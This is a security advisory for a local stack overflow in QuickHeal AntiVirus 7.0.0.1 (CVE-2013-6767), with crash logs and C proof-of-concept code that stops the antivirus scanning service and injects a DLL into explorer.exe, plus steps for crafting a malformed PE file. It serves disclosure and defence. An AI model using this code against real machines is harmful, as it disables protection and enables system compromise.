QuickHeal AntiVirus 7.0.0.1 Stack Overflow Vulnerability

2013.12.17
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Document Title: =============== QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1171 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6767 CVE-ID: ===== CVE-2013-6767 Release Date: ============= 2013-12-16 Vulnerability Laboratory ID (VL-ID): ==================================== 1171 Common Vulnerability Scoring System: ==================================== 5.6 Product & Service Introduction: =============================== The simple interface and best virus protection technology of Quick Heal AntiVirus Pro ensures complete security without interrupting or slowing down your system. Real time cloud security restricts access to malware infected websites. Spam filters stop phishing and infected emails from reaching your inbox. Uninterrupted PC usage and viewing without prompts. Quick Heal Anti-Virus is an all-round antivirus and security tool aimed at the intermediate home user. On first appearances, Quick Heal Anti-Virus doesn&#8217;t do well. Installation is complicated, and the initial window that shows up is not, in fact, the main interface. Once you find your way back to the control center, however, things become much clearer. Visually, Quick Heal Anti-Virus is fairly successful. It has a nice, if not revolutionary, interface and all the sections are easy to navigate. It also has a good selection of configuration options, where you can customize everything from what behavior the program takes when it finds a virus to setting a password so nobody can change your configurations. (Copy of the Homepage: http://www.quickheal.com/download-free-antivirus ) Abstract Advisory Information: ============================== An independent laboratory researcher discovered a local stack buffer overflow vulnerability in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software. Vulnerability Disclosure Timeline: ================================== 2013-12-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Quick Heal Technologies (P) Ltd Product: QuickHeal AntiVirus - Software 7.0.0.1 (build 2.0.0.1 - 2.0.0.0) Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A local stack buffer overflow vulnerability has been discovered in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software. The vulnerability allows local low privileged user accounts to compromise the system by a classic stack overflow issue. QuickHeal Antivirus suffers from improper handling of buffers in it`s `pepoly.dll` module on certain conditions which leads to a stack overflow. Upon disabling `Core scanning server` service, the vulnerable point could be triggered & crash the system. Just run the PoC & once you see properties dialog, change your tab from `General` to `QuickHeal`. This will cause the QuickHeal to scan your file & reports back to you the file status (whether it`s infected or clean). It`s notable that, in normal conditions I was unable to trigger the vulnerability, & this is what`s the reason why I inject a dll into `explorer.exe` to trigger the bug in right manner. The vulnerability is located in the generated PE file `*.text` value. Local attackers are able to overflow the process by a manipulated import of a malicious PE file. The issue is a classic (uni-code) stack buffer overflow. Local attackers can overwrite the registers to compromise the system or crash the quickheal software system process. The security risk of the local stack buffer overflow vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7. The vulnerability can be exploited by local attackers with low privileged system user account and without user interaction. Successful exploitation of the local stack buffer overflow software vulnerability results in process- and system compromise. Proof of Concept (PoC): ======================= The local stack buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. --- PoC Debug Logs --- eax=000015bc ebx=03f48a0c ecx=03f12a34 edx=03f47a68 esi=089c84e8 edi=00000000 eip=05bab107 esp=03f47a2c ebp=000822d8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 *** WARNING: Unable to verify checksum for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll - pepoly!GetRealTypeByContents+0x297147: Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 05bab107 8501 test dword ptr [ecx],eax ds:0023:03f12a34=00000000 0:019> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 03f47a2c 05b73afa 059342ac 00000000 000822d8 pepoly!GetRealTypeByContents+0x297147 03f47ab0 41414141 41414141 41414141 41414141 pepoly!GetRealTypeByContents+0x25fb3a 03f47ab4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47ab8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47abc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47ac0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47ac4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47ac8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47acc 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47ad0 41414141 41414141 41414141 30280000 <Unloaded_Res.dll>+0x41414110 03f47ad4 41414141 41414141 30280000 41414141 <Unloaded_Res.dll>+0x41414110 03f47ad8 41414141 30280000 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47adc 30280000 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47ae0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x3027ffcf 03f47ae4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47ae8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47aec 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47af0 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47af4 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 03f47af8 41414141 41414141 41414141 41414141 <Unloaded_Res.dll>+0x41414110 --- PoC Debug Logs --- --------------------- *.c Title : QuickHeal Antivirus Pro (Pepoly.dll) Stack Overflow Vulnerability Version : 7.0.0.1 (2014) - ( latest & other versions might also be affected ) Author : Arash Allebrahim Contact : Genius_s3c_firewall($$$)yahoo($$$)com Vendor : http://www.quickheal.com Tested : Win 7 sp 1 x86 Ultimate & Win XP SP3 ENG Note : vuln.exe should be at c:\vuln.exe => vuln.exe is just a Corrupted PE File aims at crashing & nothing more */ #include <windows.h> #include <tlhelp32.h> #include <shlwapi.h> #include <conio.h> #include <stdio.h> #include <tchar.h> #include <aclapi.h> #define WIN32_LEAN_AND_MEAN #define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) #pragma comment(lib, "advapi32.lib") typedef struct _SERVICE_STATUS_PROCESS { DWORD dwServiceType; DWORD dwCurrentState; DWORD dwControlsAccepted; DWORD dwWin32ExitCode; DWORD dwServiceSpecificExitCode; DWORD dwCheckPoint; DWORD dwWaitHint; DWORD dwProcessId; DWORD dwServiceFlags; } SERVICE_STATUS_PROCESS, *LPSERVICE_STATUS_PROCESS; VOID __stdcall DoStopSvc(); SC_HANDLE schSCManager; SC_HANDLE schService; int main(int argc, char * argv[]) { char buf[MAX_PATH] = {0}; DWORD pID = GetTargetThreadIDFromProcName("explorer.exe"); printf("\n\n"); printf("\n\nQuickHeal Antivirus (7.0.0.1) pepoly.dll stack overflow vulnerability Proof of Concept Code"); printf("\n\nAuthor : Arash Allebrahim"); GetFullPathName("ShellExecuteExProperties.dll", MAX_PATH, buf, NULL); printf("\n"); DoStopSvc(); if(!Inject(pID, buf)) { printf("\n\nDLL Not Loaded!"); }else{ printf("\n\nDLL Loaded!"); printf("\n\n( + ) It's ok! just click on QuickHeal tab!"); } _getch(); return 0; } VOID __stdcall DoStopSvc() { SERVICE_STATUS_PROCESS ssp; DWORD dwStartTime = GetTickCount(); DWORD dwBytesNeeded; DWORD dwTimeout = 30000; DWORD dwWaitTime; schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS); if (NULL == schSCManager) { printf("OpenSCManager failed (%d)\n", GetLastError()); return; } schService = OpenService( schSCManager, "Core Scanning Server", SERVICE_STOP | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS); if (schService == NULL) { printf("OpenService failed (%d)\n", GetLastError()); CloseServiceHandle(schSCManager); return; } if ( !ControlService( schService, SERVICE_CONTROL_STOP, (LPSERVICE_STATUS) &ssp ) ) { printf( "ControlService failed (%d)\n", GetLastError() ); } CloseServiceHandle(schService); CloseServiceHandle(schSCManager); } BOOL Inject(DWORD pID, const char * DLL_NAME) { HANDLE Proc; HMODULE hLib; char buf[50] = {0}; LPVOID RemoteString, LoadLibAddy; if(!pID) return FALSE; Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID); if(!Proc) { sprintf(buf, "OpenProcess() failed: %d", GetLastError()); printf(buf); return FALSE; } LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(DLL_NAME), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(Proc, (LPVOID)RemoteString, DLL_NAME, strlen(DLL_NAME), NULL); CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL); CloseHandle(Proc); return TRUE; } DWORD GetTargetThreadIDFromProcName(const char * ProcName) { PROCESSENTRY32 pe; HANDLE thSnapShot; BOOL retval, ProcFound = FALSE; thSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapShot == INVALID_HANDLE_VALUE) { printf("Error: Unable to create toolhelp snapshot!"); return FALSE; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapShot, &pe); while(retval) { if(StrStrI(pe.szExeFile, ProcName)) { return pe.th32ProcessID; } retval = Process32Next(thSnapShot, &pe); } return 0; } PoC: PE File To manipulate a PE test file you need to generate own. In the second step you replace after the PE[NULL] flag the context of the *.text (*) value with an own large uni-code string. Standard files: StdAfx.h, StdAfx.cpp These files are used to build a precompiled header (PCH) file named ShellExecuteExProperties.pch and a precompiled types file named StdAfx.obj. Other notes: AppWizard uses "TODO:" to indicate parts of the source code you should add to or customize. Resource(s): ../ShellExecuteExProperties/ShellExecuteExProperties.cpp ../ShellExecuteExProperties/ShellExecuteExProperties.dsw ../ShellExecuteExProperties/ShellExecuteExProperties.opt ../ShellExecuteExProperties/ShellExecuteExProperties.ncb ../ShellExecuteExProperties/ShellExecuteExProperties.plg ../ShellExecuteExProperties/ShellExecuteExProperties.dsp ../ShellExecuteExProperties/StdAfx.cpp ../ShellExecuteExProperties/StdAfx.h ../ShellExecuteExProperties/Debug/ShellExecuteExProperties.dll ../ShellExecuteExProperties/Debug/ShellExecuteExProperties.ilk ../ShellExecuteExProperties/Debug/ShellExecuteExProperties.obj ../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pch ../ShellExecuteExProperties/Debug/ShellExecuteExProperties.pdb ../ShellExecuteExProperties/Debug/StdAfx.obj ../ShellExecuteExProperties/Debug/vc60.idb ../ShellExecuteExProperties/Debug/vc60.pdb ../QH-PoC.c ../QH-PoC.dsp ../QH-PoC.dsw ../QH-PoC.ncb ../QH-PoC.opt ../QH-PoC.plg Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure filter and size restriction of the PE file name text flag. Security Risk: ============== The security risk of the local stack buffer overflow vulnerability is estimated as medium(+). Credits & Authors: ================== Independent Laboratory Researcher - Arash Allebrahim - (Genius_s3c_firewall($$$)yahoo($$$)com) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission. Copyright 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research () vulnerability-lab com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top